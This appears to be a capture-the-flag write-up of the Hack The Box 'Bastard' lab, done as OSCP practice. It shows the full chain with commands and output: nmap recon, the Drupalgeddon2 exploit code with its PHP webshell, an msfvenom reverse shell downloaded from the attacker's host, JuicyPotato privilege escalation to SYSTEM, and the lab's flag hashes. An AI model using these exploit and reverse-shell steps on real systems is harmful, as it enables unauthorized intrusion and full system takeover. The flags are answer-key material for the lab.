Nmap Results
# Nmap 7.92 scan initiated Tue Aug 16 00:34:56 2022 as: nmap -T5 -p80,135,49154 -A -oA scan-all -Pn 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.014s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 15.45 ms 10.10.14.1
2 15.71 ms 10.10.10.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 16 00:36:10 2022 -- 1 IP address (1 host up) scanned in 74.38 secondsService Enumeration
TCP/80
Good info from the nmap scan:
http-server-header: Microsoft-IIS/7.5Drupal 7
I check out the /robots.txt file and note the /CHANGELOG.txt entry. Opening it in the browser, it discloses a precise version number, so I take note of that for exploit research.
Tried to enumerate more files and folders with gobuster and feroxbuster , but the web server is throttling my requests. So, I'll focus on researching vulnerabilities for this version of Drupal instead.
Let's see what kind of exploits are available in Exploit DB. I am going to filter out authenticated and Metasploit payloads because:
- We do not have a valid set of credentials
- Doing this as OSCP prep, so trying to limit Metasploit usage
searchsploit Drupal 7 | grep -viE 'authenticated|metasploit'This exploit looks like it could work for the version of Drupal on the target:
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rbLet's copy the exploit to the current working directory:
searchsploit -m 44449Now, let's examine the exploit:
- The exploit makes a request to the user registration form, the URL varies based on whether or not Drupal clean URLs are enabled or not.
# Make a request, check for clean URLs status ~ Enabled: /user/register Disabled: /?q=user/register
- Then, the exploit crafts a URL and payload depending on the Drupal version.
- For Drupal 7, we inject the payload into the
namefield of the form
# Function gen_evil_url <cmd> [method] [shell] [phpfunction]
def gen_evil_url(evil, element="", shell=false, phpfunction="passthru")
- Next, the exploit tests code execution in the web form by injecting a random string into the
namefield - If the server responds
HTTP 200orHTTP 500and there's a response body, we should be good to exploit
# Generate a random string to see if we can echo it
random = (0...8).map { (65 + rand(26)).chr }.join
url, payload = gen_evil_url("echo #{random}", e)
response = http_request(url, "post", payload, $session_cookie)
if (response.code == "200" or response.code == "500") and not response.body.empty?
- Finally, the exploit injects a PHP backdoor via the form field and writes to
shell.phpthe web root
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
# Test to see if backdoor is there (if we managed to write it)
response = http_request("#{$target}#{webshellpath}", "post", "c=hostname", $session_cookie)
if response.code == "200" and not response.body.empty?
puts success("Very Good News Everyone! Wrote to the web root! Waayheeeey!!!")
break
# Forever loop
loop do
# Default value
result = "~ERROR~"
# Get input
command = Readline.readline("#{prompt}>> ", true).to_s
# Check input
puts warning("WARNING: Detected an known bad character (>)") if command =~ />/
# Exit
break if command == "exit"
...
...
...
Exploit
You may need to install a required Ruby dependency to use this exploit:
sudo gem install highlineThen, run the exploit:
ruby 44449.rb http://10.10.10.9
Post-Exploit Enumeration
The first line of order will be to get a more reliable shell. I am going to double-check the target system architecture and generate a reverse shell payload using msfvenom that I can execute as needed through the PHP pseudo-shell.
drupalgeddon2 >> systeminfo
System Type: x64-based PCNow, generate a reverse shell payload.
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -a x64 --platform windows -e x64/xor_dynamic -b '\x00' -f exe -o shell.exeStart a Python web server to transfer the file to the target:
sudo python3 -m http.server 80Use the PHP pseudo-shell to download the file to the target:
certutil.exe -urlcache -split -f http://kali-vpn-ip/shell.exe C:\Windows\Temp\shell.exeStart a listener and run the exploit:
sudo nc -lnvp <kali-tcp-port>drupalgeddon2 >> cmd.exe /c C:\Windows\Temp\shell.exe
Current User
Click to expand
USER INFORMATION
----------------
User Name SID
================= ========
nt authority\iusr S-1-5-17
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Group used for deny only
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
OS & Kernel
Click to expand
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3582622-84461
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 16/8/2022, 7:32:24 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.494 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.512 MB
Virtual Memory: In Use: 583 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
Users
Click to expand
AccountType Domain Name Disabled
----------- ------ ---- --------
512 BASTARD Administrator False
512 BASTARD dimitris False
512 BASTARD Guest True
Groups
Click to expand
Domain Name
------ ----
BASTARD Administrators
BASTARD Backup Operators
BASTARD Certificate Service DCOM Access
BASTARD Cryptographic Operators
BASTARD Distributed COM Users
BASTARD Event Log Readers
BASTARD Guests
BASTARD IIS_IUSRS
BASTARD Network Configuration Operators
BASTARD Performance Log Users
BASTARD Performance Monitor Users
BASTARD Power Users
BASTARD Print Operators
BASTARD Remote Desktop Users
BASTARD Replicator
BASTARD Users
Network
Interfaces
Windows IP Configuration
Host Name . . . . . . . . . . . . : Bastard
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-B9-42-2D
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 10.10.10.9(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
DNS Servers . . . . . . . . . . . : 10.10.10.2
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{56FEC108-3F71-4327-BF45-2B4EE355CD0F}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
ARP Table
N/A
Routes
N/A
Open Ports
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:81 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1072
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 372
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 744
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 796
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 480
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 496
TCP 10.10.10.9:139 0.0.0.0:0 LISTENING 4
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:81 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 668
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 372
TCP [::]:49153 [::]:0 LISTENING 744
TCP [::]:49154 [::]:0 LISTENING 796
TCP [::]:49155 [::]:0 LISTENING 480
TCP [::]:49156 [::]:0 LISTENING 496
Ping Sweep
N/A
Processes
Click to expand
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
32 5 964 2580 26 0,00 1852 conhost
615 11 2160 4296 49 328 csrss
70 9 5952 5752 46 388 csrss
199 16 4368 11336 56 1868 dllhost
0 0 0 24 0 0 Idle
164 25 7488 15412 86 756 LogonUI
553 20 4336 10364 45 496 lsass
136 7 2244 3784 17 504 lsm
148 18 3412 7724 60 1984 msdtc
564 16 54320 42044 115 1072 mysqld
117 18 21852 27620 118 1456 php-cgi
331 26 59644 60692 552 1,56 2172 powershell
186 12 3608 7424 32 480 services
30 2 440 1052 5 236 smss
265 19 6056 10768 80 320 spoolsv
293 32 9340 11956 55 276 svchost
347 14 3944 9280 45 596 svchost
218 16 3468 7632 37 668 svchost
275 15 8104 10388 47 744 svchost
914 40 19732 32324 124 796 svchost
519 21 6304 11428 47 844 svchost
91 8 1640 4932 30 888 svchost
416 27 10300 14456 96 928 svchost
95 10 4024 8548 41 1040 svchost
44 4 928 2592 13 1192 svchost
146 14 7144 10896 46 1344 svchost
434 0 112 304 3 4 System
97 11 4628 10404 63 1228 VGAuthService
278 23 9480 18856 86 1316 vmtoolsd
175 26 6384 12876 62 2828 w3wp
77 10 1480 4184 48 372 wininit
74 6 1452 4104 25 436 winlogon
106 9 2304 5816 36 244 WmiPrvSE
239 16 8924 14520 56 1620 WmiPrvSE
Scheduled Tasks
Click to expand
Nothing outside of default system tasks
Privilege Escalation
Looking at the output of the whoami command, the first thing that stuck out to me is the SeImpersonatePrivilege , which immediately makes me think JuicyPotato.
The privilege escalation process will look like this:
- Download the 64-bit
JuicyPotato.exebinary to Kali - Transfer it to the target using a Python web server
- Find a CLSID for ComSvcs process
- Start a listener on Kali
- Run
JuicyPotato.exeand re-use the PowerShell reverse shell exploit we already put on the host atC:\Windows\Temp\shell.exe.
First step is to download JuicyPotato.exe here and spin up the Python web server.
Releases · ohpe/juicy-potato
A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. - ohpe/juicy-potato
ohpewget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
sudo python3 -m http.server 80Now, let's download it to the target using our PowerShell reverse shell:
(New-Object Net.WebClient).DownloadFile('http://kali-vpn-ip/JuicyPotato.exe', 'C:\Windows\Temp\JuicyPotato.exe')You can find a list of ComSvcs CLSID GUIDs for Windows Server 2008 R2 here. Preferably, choose a CLSID with SYSTEM privileges.
Windows Server 2008 R2 Enterprise
A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.
Start a listener on Kali and run the exploit. We are going to re-use our PowerShell reverse shell payload, so use the same TCP port as before.
sudo nc -lnvp <kali-tcp-port>We'll use the JuicyPotato.exe exploit to run cmd.exe as SYSTEM , which will then invoke our reverse shell.
C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a '/c C:\Windows\Temp\shell.exe' -l 4444 -t * -c '{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}'
Flags
C:\Users\dimitris\Desktop\user.txt
d74dd2dd6d42153770e0acbed24eb314
C:\Users\Administrator\Desktop\root.txt
176631de8dd060d1c027607d0639471c
